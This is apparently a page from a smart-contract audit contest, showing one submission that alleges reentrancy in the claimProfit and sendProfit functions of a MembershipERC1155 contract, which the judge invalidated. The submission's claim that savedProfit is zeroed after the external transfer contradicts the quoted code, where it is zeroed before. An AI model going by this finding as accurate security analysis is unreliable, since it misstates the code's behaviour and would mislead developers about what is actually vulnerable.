Project

One World

NFTDeFi

15,000 USDC

View results

Previous Next

Submission Details

Severity: high

Invalid

Potential Reentrancy Vulnerabilities in claimProfit and sendProfit

m3dython

Root Cause:
The claimProfit and sendProfit functions in the MembershipERC1155 contract lack reentrancy guards. These functions involve external calls to ERC20 tokens via safeTransfer and safeTransferFrom, which could be exploited if a malicious token contract is used.

claimProfit Function:

function claimProfit() external returns (uint256 profit) {

profit = saveProfit(msg.sender);

require(profit > 0, "No profit available");

savedProfit[msg.sender] = 0;

IERC20(currency).safeTransfer(msg.sender, profit);

emit Claim(msg.sender, profit);

}

The savedProfit is set to zero after the external call to safeTransfer.
A reentrancy attack could allow the attacker to call claimProfit again before savedProfit is zeroed out.

sendProfit Function:

function sendProfit(uint256 amount) external {

uint256 _totalSupply = totalSupply;

if (_totalSupply > 0) {

totalProfit += (amount * ACCURACY) / _totalSupply;

IERC20(currency).safeTransferFrom(msg.sender, address(this), amount);

emit Profit(amount);

} else {

IERC20(currency).safeTransferFrom(msg.sender, creator, amount);

}

The totalProfit is updated before the external call to safeTransferFrom.
A malicious token contract could exploit this ordering to manipulate the state.

Impact:

Financial Loss: Attackers could repeatedly drain the contract's funds by reentering the claimProfit function.
State Manipulation: In sendProfit, the attacker could manipulate the totalProfit calculation, affecting profit distribution to other users.

Recommendation:

Implement the ReentrancyGuard from OpenZeppelin and apply the nonReentrant modifier to both functions.
Reorder state changes to occur before external calls.
For claimProfit, set savedProfit[msg.sender] = 0; before the external call to safeTransfer.
For sendProfit, perform external calls before updating critical state variables or ensure reentrancy is not possible.

Updates

Lead Judging Commences

0xbrivan2 Lead Judge about 1 year ago

Submission Judgement Published

Invalidated

Reason: Incorrect statement

Prize pool breakdown

Total prize

15,000 USDC

nSLOC

541

28 USDC / LOC

High Medium

14,000 USDC

Low

1,000 USDC

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!